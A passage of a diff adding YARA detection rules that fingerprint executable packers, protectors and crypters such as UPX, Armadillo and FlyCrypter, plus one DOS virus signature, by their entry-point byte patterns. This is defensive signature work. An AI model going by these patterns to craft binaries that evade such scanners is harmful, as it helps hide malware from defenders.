+		$a0 = { BE ?? ?? ?? ?? B8 00 00 ?? ?? 89 45 FC 89 C2 8B 46 0C 09 C0 0F 84 ?? 00 00 00 01 D0 89 C3 50 FF 15 94 ?? ?? ?? 09 C0 0F 85 0F 00 00 00 53 FF 15 98 ?? ?? ?? 09 C0 0F 84 ?? 00 00 00 89 45 F8 6A 00 8F 45 F4 8B 06 09 C0 8B 55 FC 0F 85 03 00 00 00 8B 46 10 01 }
+
+condition:
+		$a0
+}
+	
+	
+rule WWPACKv303
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 BB ?? ?? 53 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule GHFProtectorpackonlyGPcH
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF 10 68 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? FF 10 68 00 00 00 00 6A 40 FF D0 89 05 ?? ?? ?? ?? 89 C7 BE ?? ?? ?? ?? 60 FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 11 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 89 E8 B3 01 56 89 FE 29 C6 F3 A4 5E EB 8E 00 D2 75 05 8A 16 46 10 D2 C3 31 C9 41 E8 EE FF FF FF 11 C9 E8 E7 FF FF FF 72 F2 C3 61 B9 FC FF FF FF 8B 1C 08 89 99 ?? ?? ?? ?? E2 F5 90 90 BA ?? ?? ?? ?? BE ?? ?? ?? ?? 01 D6 8B 46 0C 85 C0 0F 84 87 00 00 00 01 D0 89 C3 50 B8 ?? ?? ?? ?? FF 10 85 C0 75 08 53 B8 ?? ?? ?? ?? FF 10 89 05 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 00 00 00 00 BA ?? ?? ?? ?? 8B 06 85 C0 75 03 8B 46 10 01 D0 03 05 ?? ?? ?? ?? 8B 18 8B 7E 10 01 D7 03 3D ?? ?? ?? ?? 85 DB 74 2B F7 C3 00 00 00 80 75 04 01 D3 43 43 81 E3 FF FF FF 0F 53 FF 35 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF 10 89 07 83 05 ?? ?? ?? ?? 04 EB AE 83 C6 14 BA ?? ?? ?? ?? E9 6E FF FF FF 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF 10 68 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? FF 10 8B 15 ?? ?? ?? ?? 52 FF D0 61 BA ?? ?? ?? ?? FF E2 90 C3 }
+	$a1 = { 60 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF 10 68 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? FF 10 68 00 00 00 00 6A 40 FF D0 89 05 ?? ?? ?? ?? 89 C7 BE ?? ?? ?? ?? 60 FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule yzpackV11UsAr
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 33 C0 8D 48 07 50 E2 FD 8B EC 64 8B 40 30 78 0C 8B 40 0C 8B 70 1C AD 8B 40 08 EB 09 8B 40 34 8D 40 7C 8B 40 3C 89 45 04 E8 F3 07 00 00 60 8B 5D 04 8B 73 3C 8B 74 33 78 03 F3 56 8B 76 20 03 F3 33 C9 49 92 41 AD 03 C3 52 33 FF 0F B6 10 38 F2 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxDanishtiny
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 C9 B4 4E CD 21 73 02 FF ?? BA ?? 00 B8 ?? 3D CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXV194MarkusOberhumerLaszloMolnarJohnReiser
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FF D5 80 A7 ?? ?? ?? ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }
+
+condition:
+		$a0
+}
+	
+	
+rule yzpack112UsAr
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5A 52 45 60 83 EC 18 8B EC 8B FC 33 C0 64 8B 40 30 78 0C 8B 40 0C 8B 70 1C AD 8B 40 08 EB 09 8B 40 34 83 C0 7C 8B 40 3C AB E9 ?? ?? ?? ?? B4 09 BA 00 00 1F CD 21 B8 01 4C CD 21 40 00 00 00 50 45 00 00 4C 01 02 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 E0 00 ?? ?? 0B 01 ?? ?? ?? ?? 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02YodasProtector102Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 00 00 00 EB 01 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02PESHiELD025Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 2B 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 CC CC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPacKV34V35LiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? ?? ?? 80 38 01 0F 84 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DualseXe10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 00 05 00 00 E8 00 00 00 00 5D 81 ED 0E 00 00 00 8D 85 08 03 00 00 89 28 33 FF 8D 85 7D 02 00 00 8D 8D 08 03 00 00 2B C8 8B 9D 58 03 00 00 E8 1C 02 00 00 8D 9D 61 02 00 00 8D B5 7C 02 00 00 46 80 3E 00 74 24 56 FF 95 0A 04 00 00 46 80 3E 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NoodleCryptv200EngNoodleSpa
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 9A E8 76 00 00 00 EB 01 9A E8 65 00 00 00 EB 01 9A E8 7D 00 00 00 EB 01 9A E8 55 00 00 00 EB 01 9A E8 43 04 00 00 EB 01 9A E8 E1 00 00 00 EB 01 9A E8 3D 00 00 00 EB 01 9A E8 EB 01 00 00 EB 01 9A E8 2C 04 00 00 EB 01 9A E8 25 00 00 00 EB 01 9A E8 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftComp1xBGSoftPT
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 81 2C 24 3A 10 41 00 5D E8 00 00 00 00 81 2C 24 31 01 00 00 8B 85 2A 0F 41 00 29 04 24 8B 04 24 89 85 2A 0F 41 00 58 8B 85 2A 0F 41 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule Petite13c1998IanLuck
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 50 8D 88 00 ?? ?? ?? 8D 90 ?? ?? 00 00 8B DC 8B E1 68 00 00 ?? ?? 53 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 DA 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PENightMarev13
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D B9 ?? ?? ?? ?? 80 31 15 41 81 F9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillo50DllSiliconRealmsToolworks
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 7C 24 08 01 75 05 E8 DE 4B 00 00 FF 74 24 04 8B 4C 24 10 8B 54 24 0C E8 ED FE FF FF 59 C2 0C 00 6A 0C 68 ?? ?? ?? ?? E8 E5 24 00 00 8B 4D 08 33 FF 3B CF 76 2E 6A E0 58 33 D2 F7 F1 3B 45 0C 1B C0 40 75 1F E8 8F 15 00 00 C7 00 0C 00 00 00 57 57 57 57 57 E8 20 15 00 00 83 C4 14 33 C0 E9 D5 00 00 00 0F AF 4D 0C 8B F1 89 75 08 3B F7 75 03 33 F6 46 33 DB 89 5D E4 83 FE E0 77 69 83 3D ?? ?? ?? ?? 03 75 4B 83 C6 0F 83 E6 F0 89 75 0C 8B 45 08 3B 05 ?? ?? ?? ?? 77 37 6A 04 E8 D7 23 00 00 59 89 7D FC FF 75 08 E8 EC 53 00 00 59 89 45 E4 C7 45 FC FE FF FF FF E8 5F 00 00 00 8B 5D E4 3B DF 74 11 FF 75 08 57 53 E8 2B C5 FF FF 83 C4 0C 3B DF 75 61 56 6A 08 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 3B DF 75 4C 39 3D ?? ?? ?? ?? 74 33 56 E8 19 ED FF FF 59 85 C0 0F 85 72 FF FF FF 8B 45 10 3B C7 0F 84 50 FF FF FF C7 00 0C 00 00 00 E9 45 FF FF FF 33 FF 8B 75 0C 6A 04 E8 7D 22 00 00 59 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ObsidiumV1350ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 03 ?? ?? ?? E8 ?? ?? ?? ?? EB 02 ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 20 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 01 ?? E8 ?? ?? ?? ?? EB 01 ?? EB 02 ?? ?? 58 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 01 ?? E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectv123RC1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 01 ?? ?? 00 E8 01 00 00 00 C3 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PUNiSHERv15DEMOFEUERRADERAHTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 04 83 A4 BC CE 60 EB 04 80 BC 04 11 E8 00 00 00 00 81 2C 24 CA C2 41 00 EB 04 64 6B 88 18 5D E8 00 00 00 00 EB 04 64 6B 88 18 81 2C 24 86 00 00 00 EB 04 64 6B 88 18 8B 85 9C C2 41 00 EB 04 64 6B 88 18 29 04 24 EB 04 64 6B 88 18 EB 04 64 6B 88 18 8B 04 }
+	$a1 = { EB 04 83 A4 BC CE 60 EB 04 80 BC 04 11 E8 00 00 00 00 81 2C 24 CA C2 41 00 EB 04 64 6B 88 18 5D E8 00 00 00 00 EB 04 64 6B 88 18 81 2C 24 86 00 00 00 EB 04 64 6B 88 18 8B 85 9C C2 41 00 EB 04 64 6B 88 18 29 04 24 EB 04 64 6B 88 18 EB 04 64 6B 88 18 8B 04 24 EB 04 64 6B 88 18 89 85 9C C2 41 00 EB 04 64 6B 88 18 58 68 9F 6F 56 B6 50 E8 5D 00 00 00 EB FF 71 78 C2 50 00 EB D3 5B F3 68 89 5C 24 48 5C 24 58 FF 8D 5C 24 58 5B 83 C3 4C 75 F4 5A 8D 71 78 75 09 81 F3 EB FF 52 BA 01 00 83 EB FC 4A FF 71 0F 75 19 8B 5C 24 00 00 81 33 50 53 8B 1B 0F FF C6 75 1B 81 F3 EB 87 1C 24 8B 8B 04 24 83 EC FC EB 01 E8 83 EC FC E9 E7 00 00 00 58 EB FF F0 EB FF C0 83 E8 FD EB FF 30 E8 C9 00 00 00 89 E0 EB FF D0 EB FF 71 0F 83 C0 01 EB FF 70 F0 71 EE EB FA EB 83 C0 14 EB FF 70 ED }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PECompactv140b2v140b4
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 86 11 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NullsoftInstallSystemv198
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 0C 53 56 57 FF 15 2C 81 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CryptoLockv202EngRyanThian
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE 15 90 40 00 8D BE EB 7F FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 }
+	$a1 = { 60 BE 15 90 40 00 8D BE EB 7F FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 }
+	$a2 = { 60 BE ?? 90 40 00 8D BE ?? ?? FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
+}
+	
+	
+rule vfpexeNcv600WangJianGuo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 01 00 00 00 63 58 E8 01 00 00 00 7A 58 2D 0D 10 40 00 8D 90 C1 10 40 00 52 50 8D 80 49 10 40 00 5D 50 8D 85 65 10 40 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 CC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule XPEORv099b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5D 8B CD 81 ED 7A 29 40 00 89 AD 0F 6D 40 00 }
+	$a1 = { E8 ?? ?? ?? ?? 5D 8B CD 81 ED 7A 29 40 ?? 89 AD 0F 6D 40 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PEiDBundlev100BoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 21 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PeCompact2253276BitSumTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 55 53 51 57 56 52 8D 98 C9 11 00 10 8B 53 18 52 8B E8 6A 40 68 00 10 00 00 FF 73 04 6A 00 8B 4B 10 03 CA 8B 01 FF D0 5A 8B F8 50 52 8B 33 8B 43 20 03 C2 8B 08 89 4B 20 8B 43 1C 03 C2 8B 08 89 4B 1C 03 F2 8B 4B 0C 03 CA 8D 43 1C 50 57 56 FF }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner02CodeLockAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 43 4F 44 45 2D 4C 4F 43 4B 2E 4F 43 58 00 01 28 01 50 4B 47 05 4C 3F B4 04 4D 4C 47 4B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv100Engdulekxt
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01BorlandDelphi50KOLMCKAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 90 90 90 90 68 ?? ?? ?? ?? 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00 FF 90 90 90 90 90 90 90 90 00 01 90 90 90 90 90 90 90 90 90 EB 04 00 00 00 01 90 90 90 90 90 90 90 00 01 90 90 90 90 90 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FlyCrypter10ut1lz
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 56 57 55 BB 2C ?? ?? 44 BE 00 30 44 44 BF 20 ?? ?? 44 80 7B 28 00 75 16 83 3F 00 74 11 8B 17 89 D0 33 D2 89 17 8B E8 FF D5 83 3F 00 75 EF 83 3D 04 30 44 44 00 74 06 FF 15 58 30 44 44 80 7B 28 02 75 0A 83 3E 00 75 05 33 C0 89 43 0C FF 15 20 30 44 44 80 7B 28 01 76 05 83 3E 00 74 22 8B 43 10 85 C0 74 1B FF 15 18 30 44 44 8B 53 10 8B 42 10 3B 42 04 74 0A 85 C0 74 06 50 E8 2F FA FF FF FF 15 24 30 44 44 80 7B 28 01 75 03 FF 53 24 80 7B 28 00 74 05 E8 35 FF FF FF 83 3B 00 75 17 83 3D 10 ?? ?? 44 00 74 06 FF 15 10 ?? ?? 44 8B 06 50 E8 51 FA FF FF 8B 03 56 8B F0 8B FB B9 0B 00 00 00 F3 A5 5E E9 73 FF FF FF 5D 5F 5E 5B C3 A3 00 30 44 44 E8 26 FF FF FF C3 }
+	$a1 = { 55 8B EC 83 C4 F0 53 B8 18 22 44 44 E8 7F F7 FF FF E8 0A F1 FF FF B8 09 00 00 00 E8 5C F1 FF FF 8B D8 85 DB 75 05 E8 85 FD FF FF 83 FB 01 75 05 E8 7B FD FF FF 83 FB 02 75 05 E8 D1 FD FF FF 83 FB 03 75 05 E8 87 FE FF FF 83 FB 04 75 05 E8 5D FD FF FF 83 FB 05 75 05 E8 B3 FD FF FF 83 FB 06 75 05 E8 69 FE FF FF 83 FB 07 75 05 E8 5F FE FF FF 83 FB 08 75 05 E8 95 FD FF FF 83 FB 09 75 05 E8 4B FE FF FF 5B E8 9D F2 FF FF 90 }
+
+condition:
+		$a0 or $a1 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakePECompact14xemadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 2E A8 00 00 C3 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 00 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule muckisprotectorIImucki
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 B8 00 00 00 00 00 00 00 31 C0 89 41 14 89 41 18 80 6A 00 E8 85 C0 74 12 64 8B 3D 18 00 00 00 8B 7F 30 0F B6 47 02 85 C0 74 01 C3 C7 04 24 ?? ?? ?? ?? BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8A 06 F6 D0 88 06 46 E2 F7 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VcasmProtector10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? 00 68 ?? ?? ?? 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 07 00 00 00 C7 83 83 C0 13 EB 0B 58 EB 02 CD 20 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NullsoftInstallSystemv20b2v20b3
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 0C 53 55 56 57 FF 15 ?? 70 40 00 8B 35 ?? 92 40 00 05 E8 03 00 00 89 44 24 14 B3 20 FF 15 2C 70 40 00 BF 00 04 00 00 68 ?? ?? ?? 00 57 FF 15 ?? ?? 40 00 57 FF 15 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VProtectorV10Dvcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 CA 31 41 00 68 06 32 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule GardianAngel10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 06 8C C8 8E D8 8E C0 FC BF ?? ?? EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXpressorv12CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC D4 01 00 00 53 56 57 EB 0C 45 78 50 72 2D 76 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RSCsProcessPatcherv14
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 E1 01 00 00 80 38 22 75 13 80 38 00 74 2E 80 38 20 75 06 80 78 FF 22 74 18 40 EB ED 80 38 00 74 1B EB 19 40 80 78 FF 20 75 F9 80 38 00 74 0D EB 0B 40 80 38 00 74 05 80 38 22 74 00 8B F8 B8 04 60 40 00 68 00 20 40 00 C7 05 A2 20 40 00 44 00 00 00 68 92 }
+
+condition:
+		$a0
+}
+	
+	
+rule Armadillov190b1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 E0 C1 40 00 68 04 89 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov190b2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 F0 C1 40 00 68 A4 89 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov190b3
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 08 E2 40 00 68 94 95 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtBorlandDelphiMicrosoftVisualCASM
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 CD 20 EB 02 CD 20 EB 02 CD 20 C1 E6 18 BB 80 ?? ?? 00 EB 02 82 B8 EB 01 10 8D 05 F4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Thinstall25xxJtit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D ?? 1A 00 00 B9 ?? 1A 00 00 BA ?? 1B 00 00 BE 00 10 00 00 BF ?? 53 00 00 BD ?? 1A 00 00 03 E8 81 75 00 ?? ?? ?? ?? ?? 75 04 ?? ?? ?? ?? 81 75 08 ?? ?? ?? ?? 81 75 0C ?? ?? ?? ?? 81 75 10 }
+	$a1 = { 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D ?? 1A 00 00 B9 ?? 1A 00 00 BA ?? 1B 00 00 BE 00 10 00 00 BF ?? 53 00 00 BD ?? 1A 00 00 03 E8 81 75 00 ?? ?? ?? ?? ?? 75 04 ?? ?? ?? ?? 81 75 08 ?? ?? ?? ?? 81 75 0C ?? ?? ?? ?? 81 75 10 ?? ?? ?? ?? 03 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 3B F1 7C 04 3B F2 7C 02 89 2E 83 C6 04 3B F7 7C E3 58 50 68 00 00 40 00 68 80 5A }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule hmimysPacker10hmimys
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5E 83 C6 64 AD 50 AD 50 83 EE 6C AD 50 AD 50 AD 50 AD 50 AD 50 E8 E7 07 }
+
+condition:
+		$a0
+}
+	
+	
+rule ACProtectV20risco
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? C3 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackV112V114LZMA430ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? 60 }
+
+condition:
+		$a0
+}
+	
+	
+rule JDPack
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 8B D5 81 ED ?? ?? ?? ?? 2B 95 ?? ?? ?? ?? 81 EA 06 ?? ?? ?? 89 95 ?? ?? ?? ?? 83 BD 45 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PESpinv1304Cyberbob
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ScObfuscatorSuperCRacker
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 33 C9 8B 1D ?? ?? ?? ?? 03 1D ?? ?? ?? ?? 8A 04 19 84 C0 74 09 3C ?? 74 05 34 ?? 88 04 19 41 3B 0D ?? ?? ?? ?? 75 E7 A1 ?? ?? ?? ?? 01 05 ?? ?? ?? ?? 61 FF 25 ?? ?? ?? ?? 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElock098SpecialBuildforgotheXer
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 99 D7 FF FF 00 00 00 ?? ?? ?? ?? AA ?? ?? 00 00 00 00 00 00 00 00 00 CA }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01DEF10Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 00 01 40 00 6A 05 59 80 7E 07 00 74 11 8B 46 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 83 C1 01 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02REALBasicAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 90 90 90 90 90 90 90 90 90 90 50 90 90 90 90 90 00 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov260c
+{
+      meta:
+		author="malware-lu"
